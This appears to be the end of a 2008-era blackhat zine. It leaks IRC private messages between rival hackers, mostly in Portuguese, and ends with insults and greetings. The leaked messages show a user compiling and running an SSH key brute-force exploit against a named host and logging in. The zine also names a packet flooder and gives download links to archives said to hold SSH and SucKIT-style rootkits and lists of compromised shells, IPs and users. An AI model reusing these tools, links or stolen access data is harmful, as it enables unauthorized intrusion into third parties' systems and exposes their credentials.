-> PRIVMSG skotch :e para de putaria
-> PRIVMSG skotch :por besteira
-> PRIVMSG skotch :vou te desblokear ->>>>>>>>> i'll unblock ya from msn babe! plz come back !
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :to indo pro trampo
-> PRIVMSG skotch :vai para com a putaria de merda ?
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :quem fica de putaria eh vc, falando bosta sem saber de nada
-> PRIVMSG skotch : *
-> PRIVMSG skotch : * eXstacy ~ # gcc sshexploit.c -o sshex -lssh
-> PRIVMSG skotch : * eXstacy ~ # ./sshex -h laggy.org -l xxxxx -d keys/ ->>>>>>> w0w, this is certainly a 0day, right ? /me rolling on the floor laughing
-> PRIVMSG skotch : * [!] KEY FOUND!
-> PRIVMSG skotch : * [!] Logging in...
-> PRIVMSG skotch : * Last login: Fri Aug 15 16:05:43 2008 from xxxxxxxxxxxxxxxxx
-> PRIVMSG skotch : * xxxxx@digitaljunk ~ $
-> PRIVMSG skotch : *
-> PRIVMSG skotch : * Not that practical since it doesnt use threads, but the code shows
-> PRIVMSG skotch : * howto make a ssh client from scratch using libssh for what purpose
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :procura se informar primeiro antes de falar merda
-> PRIVMSG skotch :so joguei verde
-> PRIVMSG skotch :sou noiado
-> PRIVMSG skotch :vc tb he
-> PRIVMSG skotch :normal
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :esse ai eh um bruteforce q usa um bug do ssh
-> PRIVMSG skotch :nao fiz mal nenhum pra vc
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pode demorar horas pra achar a key certa
-> PRIVMSG skotch :nao
-> PRIVMSG skotch :de 5 a 10 min
-> PRIVMSG skotch :o coideloko ja ta melhorando ele
-> PRIVMSG skotch :pra demorar menos
-> PRIVMSG skotch :hehe
-> PRIVMSG skotch :a oi ta bugada
-> PRIVMSG skotch :ele FUNCIONA
-> PRIVMSG skotch :e jaja
-> PRIVMSG skotch :to com 0day pra samba
-> PRIVMSG skotch :aguarde
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :so falo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pra vc fica esperto
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q tem gringo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :te sniffando
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pq fikei sabendo
-> PRIVMSG skotch :ta loko ?
-> PRIVMSG skotch :so se for na bnc
-> PRIVMSG skotch :hehehe
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :nego q ta falando com vc
-> PRIVMSG skotch :ateh entao nao ligo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :soh pra causar intriga
-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu eh meu amigo ou nao eh :?
-> PRIVMSG skotch :<skotch> so falo
-> PRIVMSG skotch :<skotch> pra vc fica esperto
-> PRIVMSG skotch :<skotch> q tem gringo
-> PRIVMSG skotch :<skotch> te sniffando
-> PRIVMSG skotch :<skotch> pq fikei sabendo
-> PRIVMSG skotch :qm sniffando ?
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :fala krl
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :skotch
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :to comend mermao
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e to atrasado pro trampo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :flw
-> PRIVMSG skotch :cara
-> PRIVMSG skotch :se tu continuar folgado
-> PRIVMSG skotch :naovaidar
-> PRIVMSG skotch :vai sew fude
-> PRIVMSG skotch :fala direito
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :isso eh facil de vc descobrir, so vc ver quem se aproximo de vc
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :ultimamente
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e n trocava ideia antes
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :so vc pensar
-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :vc
-> PRIVMSG skotch :e o thomaz
-> PRIVMSG skotch :sao os unicos
-> PRIVMSG skotch :q tem as m erda q tenho
-> PRIVMSG skotch :UNICOS
-> PRIVMSG skotch :mais ngm tem
-> PRIVMSG skotch :nao confio em m ais NGM
-> PRIVMSG skotch :eu acho q tu deveria me falar qm eh
-> PRIVMSG skotch :so isso
-> PRIVMSG skotch :e troquei de bnc ontemrs
-> PRIVMSG skotch :e troquei de bnc ontem rs ->>>>>> i changed my bnc yesterday! (we're glad)
-> PRIVMSG rip :skotch said to me that are sniffing me
-> PRIVMSG rip :but skotch dont know about nothing ->>>>>> as always, backstabbing hiZ boyfriend(skotch)


/*
* Geminid IIb. TCP/UDP/ICMP Packet flooder
*
* What can i say? Enjoy! :)
* gr33tz: PoWerPr0 and godmode0
*

thanks for the gem source by the way!

>>> there could be more logs, but some kool guyz cant stop ddosing r47, so this is kind of boring to do
>> anyway, if we get something else in the future, we will publish again. thanks buddies.
> random logs if you have nothing to do: http://labsec.elite.vc/r47-1.log http://labsec.elite.vc/r47-2.log

##########################################################################
# __ __ __ __ #
#.----.| |--.---.-.-----.| |_.-----.----. | |_| |--.----.-----.-----.#
#| __|| | _ | _ || _| -__| _| | _| | _| -__| -__|#
#|____||__|__|___._| __||____|_____|__| |____|__|__|__| |_____|_____|#
# |__| #
# #
# - download links #
##########################################################################

<><> thiZ iZ ZeRIouZ buZInEzZ dewD!
<><> http://labsec.elite.vc/x0x0x-suckY-sshd.tar.bz2
<><> http://labsec.elite.vc/x0x0x-suckY-phalanx-suckit.tar.bz2
<><> http://labsec.elite.vc/x0x0x-suckY-shells-ips-users-allinone.tar.bz2 [we are not sharing all of them, just some random ones]

<><> please guyZ, make it priv8 ! (/me rolleyes :B)

- kool&klean chapter.

##########################################################################
# _ _ ___ #
# ___ | |_ ___ ___ _| |_ ___ _ _ | | '___ _ _ _ _ #
# / | '| . |<_> || . \ | | / ._>| '_> | |-/ . \| | || '_> #
# \_|_.|_|_|<___|| _/ |_| \___.|_| |_| \___/`___||_| #
# |_| #
# #
# - conclusion #
##########################################################################


----------------- reflection time
>.......... whats the point of all this ? prove that you are better than someone ?
>......... what a joke. just coz you are lucky and had the chance it doesnt mean you are bl4ckh47.
>........ your zines are pathetic. what the fuck is this 'messages' shit in the bottom of them ?
>....... like you are able to hack someone by yourself, eh ? you cant do shit x0x0x, you ARE shit.
>...... why thank soldiers and all blackhats? you dont belong to any of them, none of them like you.
>..... why would someone send you a mail? nobody cares about you, dipshit.
>.... i cant really believe that you spent time creating a new mail just koz of your second shit zine, hahahahaha what a joke
>... stop playing hacker, you are not hacker, - we are not hackers -, you cant even do shellscript, get a life while you can.
>.. a kiss to zmda
>. think twice before you fuck with us, asshole. we know you, we know what you can do, and we know what you cant do.
> just to finish:

******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************
;
;
; _____ __ _______
;| |_.---.-.| |--.| __|.-----.----.
;| | _ || _ ||__ || -__| __|
;|_______|___._||_____||_______||_____|____|
;
; _______ __ __ __
;|_ _|.-----.--| |.--.--.-----.| |_.----.|__|.-----.-----.
; _| |_ | | _ || | |__ --|| _| _|| || -__|__ --|
;|_______||__|__|_____||_____|_____||____|__| |__||_____|_____|
; ;
;
; #LABSEC @ EFNET - closed to friends, of course.
;
; klux/djow - include - input - r3n4t0 - memelo - deadcow - w3b - kernel` - kylebond - fseek
;
; lAmE ZiNE wRitTeN bY:
;
; klux - spoof1 @RR0B@ gmail.com - hAppY flOodiNg
;
;
; wE iZ watCHiNg U
******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************

loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT